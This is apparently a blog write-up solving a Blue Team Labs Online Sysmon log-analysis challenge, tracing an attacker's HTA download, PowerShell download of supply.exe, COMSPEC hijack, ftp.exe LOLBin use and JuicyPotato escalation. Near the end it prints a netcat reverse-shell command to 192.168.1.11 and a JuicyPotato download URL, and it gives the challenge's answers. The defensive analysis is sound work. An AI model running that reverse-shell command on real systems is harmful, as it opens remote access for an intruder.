Post

Log Analysis - Sysmon

Posted Updated
Preview Image
By 2$0b.|3r0th3rcc 3 min read

I have read the questions so I can temporarily skip question 1 because I have no idea how to do it

2) What is the powershell cmdlet used to download the malware file and what is the port? (2 points)

Let’s try searching for powershell to see if there’s anything there

After I searched on the mousepad, it was quite a lot, so I grep it and export it to a file to make it easier to see

1
2

grep 'powershell' sysmon-events.json > powershell.json

image

it’s quite… ummm like tinder in my eyes @~@

image

After sitting down and reading, I saw the problem here when it downloads files supply.exe from 192.168.1.11 with port 6969

Invoke-WebRequest is a command in PowerShell to load content from a URL or interact with web services

image

INvoke-WebRequest, 6969

After determining the address of the attacker, go through the original file to see if it still interacts with anything else

image

oh well, so I downloaded something from Chrrome and then go back to question 1

What is the file that gave access to the attacker? (2 points)

I read it and everything was pretty normal until I saw a download of an updater.hta file .-.

with EventID: 15

image

We will learn about each one one by one

I just found this report :)))

image

Alt text

Information about EventID :15

This event logs when a named file stream is created, and it generates events that log the hash of the contents of the file to which the stream is assigned (the unnamed stream), as well as the contents of the named stream. There are malware variants that drop their executables or configuration settings via browser downloads, and this event is aimed at capturing that based on the browser attaching a Zone.Identifier “mark of the web” stream.

image

From now on, it can be concluded that chrome is used to download updater.hta from hosting 192.168.1.11

Do you see ZoneTransfer with ZoneId=3?

After researching on Google about ZoneTransfer

1
2
3
4
5

0 — Local Machine Zone
1 — Local Intranet Zone
2 — Trusted Sites Zone
3 — Internet Zone
4 — Restricted Sites Zone

So you know what ZoneId=3 does, right ~

updater.hta

3) What is the name of the environment variable set by the attacker? (2 points)

After a morning of research, I found a blog about this issue HUNTRESS

After reading, we know that COMSPEC is an environment variable and it usually points to cmd.exe

image

comspec=c:\Windows\temp\supply.exe

4) What is the process used as a LOLBIN to execute malicious commands? (2 points)

Here is the document for your reference Hunting for LoLBins

Simply put, it means taking advantage of any binary file provided by the operating system

after setting the environment variable comspec the binary file ftp.exe was executed

image

ftp.exe

5) Malware executed multiple same commands at a time, what is the first command executed? (2 points)

I haven’t done anything yet, just scrolled down and read it and boom!! kkk

I see it executes the ipconfig command

image

ipconfig

6) Looking at the dependency events around the malware, can you able to figure out the language, the malware is written (2 points)

After searching by supply.exe, see python27.dll, and yeh sure it is written in python code

image

python

7) Malware then downloads a new file, find out the full url of the file download (4 points)

Do you remember the powershell files we exported initially? Open them and you will see ~

I suggest you can learn more about it here juicy-potato

image

https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

8) What is the port the attacker attempts to get reverse shell? (4 points)

After juicyPotato was downloaded, the attacker executed the following command

1
2

juicy.exe -l 9999 -p nc.exe -a \"192.168.1.11 9898 -e cmd.exe\

image

9898

complete :_)

Alt text

goodbye, thank you for reading until now //~//

BTLO, Security Operations
Text Editor PowerShell Linux CLI Blue Team btlo
This post is licensed under CC BY 4.0 by the author.